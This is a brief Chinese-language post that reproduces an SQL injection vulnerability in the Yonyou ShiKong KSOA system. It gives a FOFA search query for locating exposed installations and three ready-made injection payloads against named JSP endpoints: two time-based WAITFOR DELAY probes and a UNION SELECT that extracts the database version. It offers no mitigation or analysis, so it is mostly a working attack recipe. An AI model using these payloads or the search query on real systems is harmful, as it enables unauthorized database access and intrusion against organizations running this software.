用友时空KSOA系统SQL注入漏洞复现

系统界面图

FOFA：app="用友-时空KSOA"

Paylaod:
/kp/PrintZPFB.jsp?zpfbbh=1%27%3BWAITFOR+DELAY+%270%3A0%3A3%27-- 

/kp/PrintZPZP.jsp?zpshqid=1';WAITFOR+DELAY+'0:0:5'--

/kp/PrintZPYG.jsp?zpjhid=1%27+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--+